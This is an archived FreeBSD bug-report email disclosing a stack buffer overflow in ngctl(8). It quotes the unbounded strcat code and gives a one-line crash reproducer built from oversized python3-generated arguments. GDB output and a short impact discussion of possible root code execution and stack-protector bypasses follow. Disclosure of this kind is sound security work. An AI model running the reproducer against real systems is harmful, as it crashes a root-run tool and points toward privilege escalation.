Date: Tue, 10 Feb 2026 01:21:43 +0000 From: bugzilla-noreply@freebsd.org To: bugs@FreeBSD.org Subject: [Bug 293075] Stack-based buffer overflow in ngctl(8) Message-ID: <bug-293075-227@https.bugs.freebsd.org/bugzilla/>
index | next in thread | raw e-mail
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=293075 Bug ID: 293075 Summary: Stack-based buffer overflow in ngctl(8) Product: Base System Version: 14.3-RELEASE Hardware: Any OS: Any Status: New Severity: Affects Many People Priority: --- Component: bin Assignee: bugs@FreeBSD.org Reporter: igor@bsdtrust.com Created attachment 267934 --> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=267934&action=edit ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)') Dear FreeBSD Security Team, I am reporting a stack-based buffer overflow in ngctl(8) that allows any user to crash (and potentially exploit to code execution) the binary, which is typically executed as root. I want register a CVE for this memory corruption vulnerability. Vulnerability Details File: usr.sbin/ngctl/config.c (function ConfigCmd) Buffer: char buf[NG_TEXTRESPONSE]; → NG_TEXTRESPONSE == 1024 Vulnerable code (still present in current main branch – confirmed via cgit.freebsd.org): Cchar buf[NG_TEXTRESPONSE]; *buf = '\0'; for (i = 2; i < ac; i++) { if (i != 2) strcat(buf, " "); strcat(buf, av[i]); /* ← NO BOUNDS CHECKING */ } Proof of Vulnerability (PoC + GDB) Reproduction (any FreeBSD 13/14/15-CURRENT): ngctl config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)') Crash output: textngctl: send msg: No such file or directory Feb 9 18:39:10 hostname ngctl[980]: stack overflow detected; terminated Abort trap (core dumped) root@igor:~ # gdb ngctl -q GEF for freebsd ready, type `gef' to start, `gef config' to configure 93 commands loaded and 5 functions added for GDB 15.1 [GDB v15.1 for FreeBSD] in 0.00ms using Python engine 3.11 Reading symbols from ngctl... (No debugging symbols found in ngctl) gef➤ r config dummy $(python3 -c 'print("A"*1200)') $(python3 -c 'print("B"*1200)') [ Legend: Modified register | Code | Heap | Stack | String ] ────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── $rax : 0x0 $rbx : 0x000000080111e644 → "stack overflow detected; terminated" $rcx : 0x00000008012152da → <getpid+000a> jb 0x801215178 $rdx : 0x0 $rsp : 0x00007fffffffcf88 → 0x00000008012188b0 → mov edi, 0x7f $rbp : 0x00007fffffffcfd0 → 0x00007fffffffcfe0 → 0x00007fffffffd860 → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]" $rsi : 0x6 $rdi : 0x422 $rip : 0x000000080121545a → <kill+000a> jb 0x801215178 $r8 : 0x0 $r9 : 0x0 $r10 : 0x0 $r11 : 0x000000080182d4a8 → 0x0032302d00544d4c ("LMT"?) $r12 : 0x00000008012cb950 → 0x64a4d3bb4ddc49a0 $r13 : 0x4 $r14 : 0x00007fffffffcf90 → 0xffffffffffffffdf $r15 : 0x2 $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x43 $ss: 0x3b $ds: 0x3b $es: 0x3b $fs: 0x13 $gs: 0x1b ────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0x00007fffffffcf88│+0x0000: 0x00000008012188b0 → mov edi, 0x7f ← $rsp 0x00007fffffffcf90│+0x0008: 0xffffffffffffffdf ← $r14 0x00007fffffffcf98│+0x0010: 0xffffffffffffffff 0x00007fffffffcfa0│+0x0018: 0x0000000000000000 0x00007fffffffcfa8│+0x0020: 0x0000000000000000 0x00007fffffffcfb0│+0x0028: 0x0000000000000000 0x00007fffffffcfb8│+0x0030: 0x0000000000000000 0x00007fffffffcfc0│+0x0038: 0x00007fffffffe497 → 0x414100796d6d7564 ("dummy"?) ──────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── 0x801215450 <kill+0000> mov eax, 0x25 0x801215455 <kill+0005> mov r10, rcx 0x801215458 <kill+0008> syscall → 0x80121545a <kill+000a> jb 0x801215178 NOT taken [Reason: !(C)] 0x801215460 <kill+0010> ret 0x801215461 int3 0x801215462 int3 0x801215463 int3 0x801215464 int3 ──────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, stopped 0x80121545a in kill (), reason: SIGABRT ────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x80121545a → kill() [#1] 0x8012188b0 → mov edi, 0x7f [#2] 0x801218820 → __stack_chk_fail() [#3] 0x1026e9b → int3 ────────────────────── The overflow reaches the stack canary (and potentially saved return address/ebp) → confirmed stack smash. root@igor:~ # uname -a FreeBSD igor 14.3-RELEASE FreeBSD 14.3-RELEASE releng/14.3-n271432-8c9ce319fef7 GENERIC amd64 Impact DoS → any user with access to ngctl can crash it. Code execution → root binary + stack overflow. SSP prevents simple ROP, but bypasses exist (older builds, -fno-stack-protector, infoleak, etc.). Common scenario: jails, monitoring scripts, or any system with netgraph enabled. I want register a CVE for this memory corruption vulnerability Credits: Author: Igor Gabriel Sousa e Souza Email: igor@bsdtrust.com LinkedIn: https://www.linkedin.com/in/igo0r Thanks! -- You are receiving this mail because: You are the assignee for the bug.home | help
Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-293075-227>